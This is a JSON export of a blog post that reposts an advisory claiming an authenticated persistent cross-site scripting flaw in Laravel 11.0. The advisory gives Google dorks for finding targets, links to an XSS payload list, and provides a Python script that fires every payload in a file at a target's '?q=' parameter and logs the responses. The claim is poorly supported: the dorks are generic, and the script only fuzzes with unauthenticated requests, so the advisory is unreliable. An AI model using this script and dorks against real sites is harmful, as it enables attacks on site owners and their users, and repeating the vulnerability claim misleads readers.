{"id":60580,"date":"2024-12-03T13:21:21","date_gmt":"2024-12-03T10:21:21","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182896\/laravel11-xss.txt"},"modified":"2024-12-03T13:21:21","modified_gmt":"2024-12-03T10:21:21","slug":"laravel-11-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/laravel-11-0-cross-site-scripting\/","title":{"rendered":"Laravel 11.0 Cross Site Scripting"},"content":{"rendered":"
\/*!
- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:.com\/?q=
- # GOOGLE DORK: Site:.com\/?q=
- # DATE: 2024-12-01
- # SECURITY RESEARCHER:  E1.Coders
- # VENDOR: LARAVEL [https:\/\/laravel.com\/ ]- # SOFTWARE LINK: https:\/\/laravel.com\/docs\/11.x\/installation
- # CVSS: AV:N\/AC:L\/PR:H\/UI:N\/S:C
- # CWE: CWE-79
- # download payload https:\/\/raw.githubusercontent.com\/payloadbox\/xss-payload-list\/refs\/heads\/master\/Intruder\/xss-payload-list.txt
*\/
 
 
### -- [ Info: ] 
[i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website.
 
[i] Vulnerable parameter(s): - inurl:.com\/?q=    [AND]    Site:.com\/?q=
 
 
### -- [ Impact: ] 
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
 
 
### -- [ EXPLOIT : ] 
 
 
import requests
 
# Target URL
url = \"https:\/\/TARGET.com\/?q=\"
 
# Function to read payloads from a file
def read_payloads(filename=\"payloads.txt\"):
    try:
        with open(filename, \"r\") as f:
            payloads = [line.strip() for line in f]        return payloads
    except FileNotFoundError:
        print(f\"Error: File '{filename}' not found.\")
        return [] 
# Function to perform the request
def xss_attack(url, payload):
    full_url = url + payload
    try:
        response = requests.get(full_url)
        return response.status_code, response.text # return status code and response text
    except requests.exceptions.RequestException as e:
        print(f\"An error occurred during the request: {e}\")
        return None, None
 
# Main function to iterate over payloads and attack
def main():
    payloads = read_payloads()
    if not payloads:
        return
 
    results = []    for payload in payloads:
        status_code, response_text = xss_attack(url, payload)
        if status_code:
          results.append({\"payload\": payload, \"status_code\": status_code, \"response\": response_text})
 
    #Save results to a file (Example, you might need to adjust based on your desired output)
    with open(\"attack_results.txt\", \"w\") as f:
        for result in results:
            f.write(f\"Payload: {result['payload']}\\n\")
            f.write(f\"Status Code: {result['status_code']}\\n\")
            f.write(f\"Response: {result['response']}\\n\\n\")
 
if __name__ == \"__main__\":
    main()
 
 
 
### -- [ Contacts: ] 
[+] E-Mail: E1.Coders@Mail.Ru
 
[+] GitHub: @e1coders
<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\/*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 – # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com\/?q=- # GOOGLE DORK: Site:.com\/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https:\/\/laravel.com\/ ]- # SOFTWARE LINK: https:\/\/laravel.com\/docs\/11.x\/installation- # CVSS: AV:N\/AC:L\/PR:H\/UI:N\/S:C- # CWE: CWE-79- # download payload https:\/\/raw.githubusercontent.com\/payloadbox\/xss-payload-list\/refs\/heads\/master\/Intruder\/xss-payload-list.txt*\/  ### — [ Info: ] [i] A valid persistent XSS …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60580","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60580"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60580\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}